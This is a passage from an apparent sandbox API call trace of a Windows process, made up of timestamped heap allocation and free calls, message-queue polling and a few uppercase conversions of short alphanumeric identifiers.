hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0113.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0113.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0113.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0113.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0113.430] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0113.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0113.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0113.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0113.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0113.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0113.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0113.430] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0113.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0113.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0113.430] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0113.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0113.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0113.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0113.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719c8 [0113.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0113.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0113.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0113.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0113.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x161dc) returned 0x2a7a130 [0113.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0113.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ab8 [0113.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0113.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0113.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0113.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ad8 [0113.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0113.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0113.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0113.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ae8 [0113.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0113.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0113.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0113.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa0a8 [0113.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0113.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0113.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0113.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0113.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0113.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0113.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0113.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x161dc) returned 0x37d6230 [0113.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0113.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0113.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0113.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0113.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0113.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0113.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0113.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0113.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0113.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0113.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0113.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0113.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0113.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0113.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0113.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0113.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0113.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0113.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0113.433] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0113.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0113.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0113.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0113.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0113.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0113.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0113.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0113.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0113.433] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0113.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0113.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0113.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0113.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0113.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0113.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0113.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0113.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0113.433] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0113.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0113.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0113.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0113.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0113.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0113.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0113.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0113.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0113.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0113.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0113.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0113.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0113.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0113.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0113.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0113.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0113.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0113.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0113.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0113.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0113.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0113.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0113.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0113.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0113.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0113.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0113.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0113.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0113.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0113.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0113.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0113.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0113.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0113.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0113.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0113.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0113.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0113.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0113.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0113.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0113.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0113.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0113.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0113.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0113.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0113.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0113.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0113.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0113.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0113.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0113.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0113.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0113.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0113.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0113.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0113.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0113.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0113.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0113.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0113.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0113.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0113.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0113.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0113.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0113.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0113.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0113.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0113.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0113.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0113.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0113.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0113.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0113.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0113.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0113.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0113.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0113.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0113.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0113.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0113.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0113.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0113.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0113.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0113.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0113.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0113.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0113.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0113.437] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0113.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0113.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0113.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa000 [0113.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0113.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0113.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0113.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa498 [0113.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0113.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0113.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa468 [0113.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0113.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0113.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0113.437] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0113.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0113.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0113.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0113.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0113.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0113.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0113.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0113.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0113.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0113.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0113.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0113.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0113.438] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0113.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0113.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0113.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa270 [0113.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74358 [0113.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0113.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0113.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0113.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0113.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0113.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0113.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0113.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0113.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0113.438] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0113.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0113.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0113.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0113.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0113.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0113.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0113.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0113.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0113.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0113.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0113.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0113.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0113.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0113.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0113.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa288 [0113.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0113.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0113.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0113.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0113.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0113.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0113.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74358 | out: hHeap=0x2af0000) returned 1 [0113.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0113.439] 